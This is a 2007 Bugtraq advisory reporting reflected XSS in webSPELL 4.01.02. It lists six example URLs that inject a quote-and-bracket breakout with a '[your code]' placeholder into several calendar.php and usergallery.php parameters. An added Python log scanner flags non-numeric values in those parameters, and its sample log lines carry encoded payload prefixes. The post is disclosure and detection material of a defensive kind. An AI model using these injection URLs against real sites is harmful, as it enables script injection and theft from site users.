Bugtraq mailing list archives

webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability


From: brainheadbrainhead () gmx de
Date: 8 Dec 2007 22:53:59 -0000

###################
Author: Brainhead
Type: XSS
Version: 4.01.02
Files: usergallery.php, calendar.php
Magic Quotes: off
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your code]
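
For defenders reviewing web server logs, the following is an added example (not part of the original post and not webSPELL code) that flags requests where one of the parameters listed above carries a non-numeric value. It assumes these parameters are plain integers in legitimate use and that the log is in combined log format; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in the advisory, keyed by the (site, action) pair they appear under.
WATCHED = {
    ("usergallery", "upload"): {"galleryID"},
    ("calendar", "announce"): {"upID", "tag", "month", "userID", "year"},
}
# Assumption: every watched parameter is a short non-negative integer in normal use.
NUMERIC = re.compile(r"[0-9]{1,10}")
# Request target inside the quoted request field: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP range, placeholder payload text).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Dec/2007:22:10:01 +0000] "GET /index.php?site=calendar&action=announce&month=12&year=2007 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Dec/2007:22:11:37 +0000] "GET /index.php?site=calendar&action=announce&tag=%22%3B%3EPLACEHOLDER HTTP/1.1" 200 5203',
    '192.0.2.10 - - [08/Dec/2007:22:12:02 +0000] "GET /index.php?site=news&action=show&year=abc HTTP/1.1" 200 4410',
    '192.0.2.44 - - [08/Dec/2007:22:12:09 +0000] "GET /index.php?site=usergallery&action=upload&galleryID=%22%3B%3EPLACEHOLDER HTTP/1.1" 200 4498',
]

def suspicious_params(target):
    """Return sorted (name, value) pairs where a watched parameter is not numeric."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    site = query.get("site", [""])[0]
    action = query.get("action", [""])[0]
    hits = []
    for name in WATCHED.get((site, action), ()):
        for value in query.get(name, []):
            if not NUMERIC.fullmatch(value):
                hits.append((name, value))
    return sorted(hits)

def scan(lines):
    """Yield (line_number, hits) for each log line with a non-numeric watched parameter."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

Only the query string is inspected, so parameters sent in a POST body are not covered by this check.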

